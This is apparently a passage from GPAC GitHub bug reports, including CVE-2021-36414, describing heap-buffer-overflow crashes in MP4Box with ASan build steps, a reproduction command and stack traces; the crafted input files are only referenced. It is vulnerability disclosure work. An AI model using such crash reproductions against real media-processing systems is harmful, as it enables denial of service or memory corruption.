    105		gf_bs_write_u16_le(bs, 8*sample_size*sample_rate/block_size);      <------ block_size can be zero
    106		gf_bs_write_u16_le(bs, sample_size);
    107		gf_bs_write_u16_le(bs, block_size);
    108		gf_bs_write_u16_le(bs, sample_rate);
    109		gf_bs_write_u16_le(bs, entry->bitspersample);
    110		gf_bs_write_u32_le(bs, sample_size ? 0 : 7);
    

Verification steps：  
1.Get the source code of gpac  
2.Compile

    cd gpac-master
    CC=gcc CXX=g++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" ./configure
    make
    

3.run MP4Box

    ./MP4Box -hint poc -out /dev/null
    

In Command line:

    [iso file] Unknown box type esJs in parent enca
    [iso file] Unknown box type stts in parent enca
    [iso file] Box "enca" (start 1455) has 5 extra bytes
    [iso file] Box "enca" is larger than container box
    [iso file] Box "stsd" size 171 (start 1439) invalid (read 192)
    Floating point exception
    

gdb info

![1625476927(1)](https://user-images.githubusercontent.com/83855894/124471055-ffd3bc80-ddce-11eb-8902-1e7c60e568bb.png)

asan info

    =================================================================
    ==967870==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001874 at pc 0x7f3a53c0836c bp 0x7ffcce36e790 sp 0x7ffcce36e780
    READ of size 4 at 0x602000001874 thread T0
        #0 0x7f3a53c0836b in gf_isom_get_3gpp_audio_esd isomedia/media.c:104
        #1 0x7f3a53c0836b in Media_GetESD isomedia/media.c:330
        #2 0x7f3a53b1ac04 in gf_isom_get_decoder_config isomedia/isom_read.c:1329
        #3 0x7f3a53b56d2e in gf_isom_guess_specification isomedia/isom_read.c:4035
        #4 0x5602827ad1d1 in HintFile /home/.../gpac/gpac-master-A/applications/mp4box/main.c:3379
        #5 0x5602827c4d54 in mp4boxMain /home/.../gpac/gpac-master-A/applications/mp4box/main.c:6297
        #6 0x7f3a52d080b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #7 0x560282777f1d in _start (/home/.../gpac/gpac-master-A/bin/gcc/MP4Box+0x48f1d)
    
    0x602000001874 is located 3 bytes to the right of 1-byte region [0x602000001870,0x602000001871)
    allocated by thread T0 here:
        #0 0x7f3a55be6bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
        #1 0x7f3a539e10ec in stts_box_read isomedia/box_code_base.c:5788
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/media.c:104 in gf_isom_get_3gpp_audio_esd
    Shadow bytes around the buggy address:
      0x0c047fff82b0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
      0x0c047fff82c0: fa fa fd fd fa fa fd fd fa fa fd fa fa fa 00 00
      0x0c047fff82d0: fa fa 01 fa fa fa 00 00 fa fa 00 00 fa fa 00 00
      0x0c047fff82e0: fa fa 00 00 fa fa 01 fa fa fa 00 00 fa fa 00 00
      0x0c047fff82f0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
    =>0x0c047fff8300: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa[01]fa
      0x0c047fff8310: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
      0x0c047fff8320: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
      0x0c047fff8330: fa fa 01 fa fa fa 00 00 fa fa 00 00 fa fa 00 00
      0x0c047fff8340: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd
      0x0c047fff8350: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==967870==ABORTING

CVE-2021-36414: heap buffer overflow issue with gpac MP4Box · Issue #1840 · gpac/gpac

A heap-based buffer overflow vulnerability exists in MP4Box in GPAC 1.0.1 via the gp_rtp_builder_do_mpeg12_video function, which allows attackers to possibly have unspecified other impact via a crafted file in the MP4Box command,

Hello,  
A heap-buffer-overflow has occurred when running program MP4Box,this can reproduce on the lattest commit.  
System info：  
Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0

poc1.zip

Verification steps：  
1.Get the source code of gpac  
2.Compile

    cd gpac-master
    CC=gcc CXX=g++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" ./configure
    make
    

3.run MP4Box

    ./MP4Box -hint poc -out /dev/null
    

asan info

    =================================================================
    ==2631249==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001bd4 at pc 0x7f2ac7fe5b9b bp 0x7ffc4389ba70 sp 0x7ffc4389ba60
    READ of size 1 at 0x602000001bd4 thread T0
        #0 0x7f2ac7fe5b9a in gp_rtp_builder_do_mpeg12_video ietf/rtp_pck_mpeg12.c:156
        #1 0x7f2ac889948a in gf_hinter_track_process media_tools/isom_hinter.c:808
        #2 0x559f0eb8ae2b in HintFile /home/.../gpac/gpac-master/applications/mp4box/main.c:3499
        #3 0x559f0eba1d54 in mp4boxMain /home/.../gpac/gpac-master/applications/mp4box/main.c:6297
        #4 0x7f2ac74d10b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #5 0x559f0eb54f1d in _start (/home/.../gpac/gpac-master/bin/gcc/MP4Boxfl+0x48f1d)
    
    0x602000001bd4 is located 0 bytes to the right of 4-byte region [0x602000001bd0,0x602000001bd4)
    allocated by thread T0 here:
        #0 0x7f2aca3afbc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
        #1 0x7f2ac83d56cd in Media_GetSample isomedia/media.c:617
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ietf/rtp_pck_mpeg12.c:156 in gp_rtp_builder_do_mpeg12_video
    Shadow bytes around the buggy address:
      0x0c047fff8320: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
      0x0c047fff8330: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
      0x0c047fff8340: fa fa fd fd fa fa fd fd fa fa fd fa fa fa 00 00
      0x0c047fff8350: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
      0x0c047fff8360: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
    =>0x0c047fff8370: fa fa 00 00 fa fa 00 00 fa fa[04]fa fa fa fa fa
      0x0c047fff8380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff83a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff83b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff83c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2631249==ABORTING
    

source code of rtp\_pck\_mpeg12.c

    143 max_pck_size = builder->Path_MTU - 4;
    144
    145	payload = data + offset;
    146	pic_type = (payload[1] >> 3) & 0x7;
    147	/*first 6 bits (MBZ and T bit) not used*/
    148	/*temp ref on 10 bits*/
    149	mpv_hdr[0] = (payload[0] >> 6) & 0x3;
    150	mpv_hdr[1] = (payload[0] << 2) | ((payload[1] >> 6) & 0x3);
    151	mpv_hdr[2] = pic_type;
    152	mpv_hdr[3] = 0;
    153
    154	if ((pic_type==2) || (pic_type== 3)) {
    155		mpv_hdr[3] = (u8) ((((u32)payload[3]) << 5) & 0xf);
    156		if ((payload[4] & 0x80) != 0) mpv_hdr[3] |= 0x10;
    157		if (pic_type == 3) mpv_hdr[3] |= (payload[4] >> 3) & 0xf;
    158	}

Tag

#ubuntu